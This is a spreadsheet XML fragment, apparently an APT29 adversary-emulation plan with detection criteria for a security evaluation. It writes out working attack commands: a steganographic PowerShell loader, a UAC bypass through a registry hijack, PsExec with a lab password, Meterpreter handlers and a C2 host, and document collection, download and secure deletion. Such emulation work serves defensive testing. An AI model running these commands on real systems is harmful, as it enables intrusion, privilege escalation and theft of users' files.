        <scheme val="minor"/>
      </rPr>
      <t>[pupy CMD] &gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> powershell</t>
    </r>
  </si>
  <si>
    <r>
      <t>3.C - Modify Registry (T1112)
[pupy (PowerShell)] &gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 
[pupy (PowerShell)] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>exit</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 
[pupy (CMD)] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>exit</t>
    </r>
  </si>
  <si>
    <t>Established C2 channel (10.10.0.166) via PowerShell payload over TCP port 443</t>
  </si>
  <si>
    <t>Used HTTPS to transport C2 (10.10.0.166) traffic</t>
  </si>
  <si>
    <t>Used HTTPS to encrypt C2 (10.10.0.166) traffic</t>
  </si>
  <si>
    <t>Dropped additional tools (SysinternalsSuite.zip) to disk over C2 channel (10.10.0.166)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3.B - Abuse Elevation Control Mechanism: Bypass User Access Control (T1088 / T1548.002)
[pupy (PowerShell)] &gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>New-Item -Path HKCU:\Software\Classes -Name Folder -Force;
New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force;
New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force;
New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force;
Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Paste the following 1-liner when prompted for value:
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>powershell -noni -noexit -window hidden -ep bypass -c "sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap('C:\Users\local.admin\Downloads\haha.png');$o=a Byte[] 3900;(0..12)|foreach-object{foreach($x in(0..299)){$p=$g.GetPixel($x,$_);$o[$_*300+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3751]))"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[pupy (PowerShell)] &gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Force</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
When prompted for value, press: [Enter]
[pupy (PowerShell)] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>exit</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 
[pupy (CMD)] &gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> %windir%\system32\sdclt.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 
[pupy CMD] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">powershell
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
You should receive a high integrity Meterpreter callback.</t>
    </r>
  </si>
  <si>
    <t>file_path ~ "hostui.lnk"</t>
  </si>
  <si>
    <t>file_path ~ "o3atjey5.exv.pfx"</t>
  </si>
  <si>
    <t>powershell.exe reading files in C:\Users\local.admin\Downloads\</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">8.A - Remote Services: Windows Remote Management (T1021 / T1021.006)
Copy payload to webdav share:
[user@attacker]# </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>cp attack-evals/apt29/day1/payloads/python.exe /var/www/webdav/</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 
[user@attacker]#</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> cd /var/www/webdav</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 
[user@attacker]# </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>chown -R www-data:www-data python.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Switch back to Meterpreter shell:
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Ad-Search Computer Name *</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Invoke-Command -ComputerName 210WIN10 -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Note the session ID for step 8C.</t>
    </r>
  </si>
  <si>
    <t>Network connection to 210WIN10 (20.20.101.210) over port 5985</t>
  </si>
  <si>
    <t>Established WinRM connection to remote host 210WIN10 (20.20.101.210)</t>
  </si>
  <si>
    <t>Enumerated processes on remote host 210WIN10 (20.20.101.210) using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe making LDAP queries over port 389 to the Domain Controller (20.20.101.203)</t>
  </si>
  <si>
    <t>The file python.exe created on victim2 (20.20.101.210)</t>
  </si>
  <si>
    <t>Copied python.exe payload from a WebDAV share (10.10.0.166) to remote host 210WIN10 (20.20.101.210)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">8.B - Ingress Tool Transfer (T1105)
Start a new instance of Metasploit, and spawn a Metasploit handler:
[bash] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>msfconsole</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[msf] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>handler -H 0.0.0.0 -P 8443 -p python/meterpreter/reverse_https</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Return to current Meterpreter session:
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Invoke-SeaDukeStage -ComputerName 210WIN10</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">8.C - System Services: Service Execution (T1035 / T1569.002)
Execute SEADUKE Remotely via PSEXEC
[meterpreter (PowerShell)*] &gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>.\PsExec64.exe -accepteula \\210WIN10 -u "testlab\local.admin" -p VMT3st#123 -i 1 "C:\Windows\Temp\python.exe"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
You should receive a callback in your other Metasploit terminal.</t>
    </r>
  </si>
  <si>
    <t>SMB session to 210WIN10  (20.20.101.210) over TCP port 445/135 OR evidence of usage of a Windows share</t>
  </si>
  <si>
    <t>Logged on to remote host 210WIN10 (20.20.101.210) using valid credentials for user 210WIN10</t>
  </si>
  <si>
    <t>Established SMB session to remote host 210WIN10 (20.20.101.210) IPC$ share using PsExec</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">9.A - Ingress Tool Transfer (T1105)
From the second Metasploit terminal:
[msf] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>sessions</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 
[msf] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>sessions -i 1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter*] &gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>upload "/var/www/webdav/APT29/rar.exe" "C:\\Windows\\Temp\\rar.exe"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter*] &gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>upload "/var/www/webdav/APT29/SysinternalsSuite/sdelete64.exe" "C:\\Windows\\Temp\\sdelete64.exe"</t>
    </r>
  </si>
  <si>
    <t>Dropped sdelete.exe to disk on remote host 210WIN10  (20.20.101.210)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">9.B - Collection and Exfiltration (T1005, T1041, T1002, T1022 / T1560.001)
[meterpreter*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>execute -f powershell.exe -i -H</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>$env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>cd C:\Windows\Temp</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; .</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>\rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>exit</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>download "C:\\Users\\local.admin\\Desktop\\working.zip" .</t>
    </r>
  </si>
  <si>
    <t>Recursively collected files found in C:\Users\local.admin\ using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe reading files in C:\Users\local.admin\</t>
  </si>
  <si>
    <t>Read and downloaded ZIP (working.zip on Desktop) over C2 channel (10.10.0.166) over TCP port 8443)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">9.C - Indicator Removal on Host: File Deletion (T1107 / T1070.004)
[meterpreter*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>shell</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (Shell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>cd "C:\Windows\Temp"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (Shell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>.\sdelete64.exe /accepteula "C:\Windows\Temp\rar.exe"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (Shell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>.\sdelete64.exe /accepteula "C:\Users\local.admin\AppData\Roaming\working.zip"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (Shell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>.\sdelete64.exe /accepteula "C:\Users\local.admin\Desktop\working.zip"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (Shell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>del "C:\Windows\Temp\sdelete64.exe"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Terminate Session
[meterpreter (Shell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>exit</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 
[meterpreter*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>exit</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 
[msf]&gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>exit</t>
    </r>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>source_process_path ~ "powershell.exe"</t>
  </si>
  <si>
    <t>source_process_path ~ "cmd.exe"</t>
  </si>
  <si>
    <t>dst = "10.10.0.166"</t>
  </si>
  <si>
    <t>file_path ~ "haha.png"</t>
  </si>
  <si>
    <t>reg_target_object ~"\Folder\shell\open\command\"</t>
  </si>
  <si>
    <t>Note</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">4.B - Indicator Removal on Host: File Deletion (T1107 / T1070.004)
Terminate Pupy RAT process:
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Get-Process</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Stop-Process -Id &lt;rcs.3aka3.doc PID&gt; -Force</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
You may now close Pupy.
From Metasploit:
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Gci $env:userprofile\Downloads</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>.\sdelete64.exe /accepteula "$env:userprofile\Downloads\?cod.3aka3.scr"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> .\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>.\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysinternalsSuite.zip"</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Import custom script, readme.ps1:
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Move-Item .\readme.txt readme.ps1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>. .\readme.ps1</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">6.A - Credentials from Password Stores: Credentials from Web Browsers (T1003 / T1555.003)
Change chrome-password name.exe to accesschk.exe and excute the dumpster collector:
[meterpreter (PowerShell)*] &gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&amp; "C:\Program Files\SysinternalsSuite\SysinternalsSuite\accesschk.exe"</t>
    </r>
  </si>
  <si>
    <t>11.A.1</t>
  </si>
  <si>
    <t>T1024 /T1024.002</t>
  </si>
  <si>
    <t xml:space="preserve">User Execution: Malicious File </t>
  </si>
  <si>
    <t>1. As non-domain admin user, execute 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (double click), output will display in terminal
2. You will now receive a new, low integrity callback</t>
  </si>
  <si>
    <t>powershell.exe spawning from explorer.exe</t>
  </si>
  <si>
    <t>11.A.2</t>
  </si>
  <si>
    <t>T1564/T1564.004</t>
  </si>
  <si>
    <t>Hide Artifacts: NTFS File Attributes</t>
  </si>
  <si>
    <t>Executed an alternate data stream (ADS) using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing the schemas ADS via Get-Content and IEX</t>
  </si>
  <si>
    <t>11.A.3</t>
  </si>
  <si>
    <t>T1497/T1497.001</t>
  </si>
  <si>
    <t xml:space="preserve">Virtualization/Sandbox Evasion: System Checks </t>
  </si>
  <si>
    <t>Checked that the BIOS version and serial number are not associated with VirtualBox or VMware using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing a Get-WmiObject query for Win32_BIOS</t>
  </si>
  <si>
    <t>11.A.4</t>
  </si>
  <si>
    <t>Enumerated computer manufacturer, model, and version information using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing a Get-WmiObject gwmi queries for Win32_BIOS and Win32_ComputerSystem</t>
  </si>
  <si>
    <t>11.A.5</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>Enumerated devices/adapters to check for presence of VirtualBox driver(s) using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing a Get-WmiObject query for Win32_PnPEntity</t>
  </si>
  <si>
    <t>11.A.6</t>
  </si>
  <si>
    <t>T11033</t>
  </si>
  <si>
    <t>Checked that the username is not related to admin or a generic value (ex: user) using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing a Get-WmiObject query for Win32_ComputerSystem</t>
  </si>
  <si>
    <t>11.A.7</t>
  </si>
  <si>
    <t>Checked that the computer is joined to a domain using PowerShell</t>
  </si>
  <si>
    <t>11.A.8</t>
  </si>
  <si>
    <t xml:space="preserve">Process Discovery </t>
  </si>
  <si>
    <t>Checked that processes such as procexp.exe, taskmgr.exe, or wireshark.exe are not running using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing a Get-WmiObject query for Win32_Process</t>
  </si>
  <si>
    <t>11.A.9</t>
  </si>
  <si>
    <t>Checked that the payload is not inside a folder path that contains "sample" or is the length of a hash value using PowerShell</t>
  </si>
  <si>
    <t>powershell.exe executing (Get-Item -Path ".\" -Verbose).FullName</t>
  </si>
  <si>
    <t>11.A.10</t>
  </si>
  <si>
    <t>Decoded an embedded DLL payload to disk using certutil.exe</t>
  </si>
  <si>
    <t>certutil.exe decoding kxwn.lock</t>
  </si>
  <si>
    <t>11.A.11</t>
  </si>
  <si>
    <t>Established Registry Run key persistence using PowerShell</t>
  </si>
  <si>
    <t>Addition of the Webcache subkey in HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</t>
  </si>
  <si>
    <t>11.A.12</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Powershell</t>
  </si>
  <si>
    <t>Executed PowerShell stager payload</t>
  </si>
  <si>
    <t>powershell.exe spawning from from the schemas ADS (powershell.exe)</t>
  </si>
  <si>
    <t>11.A.13</t>
  </si>
  <si>
    <t xml:space="preserve">Common Used Port </t>
  </si>
  <si>
    <t>11.A.14</t>
  </si>
  <si>
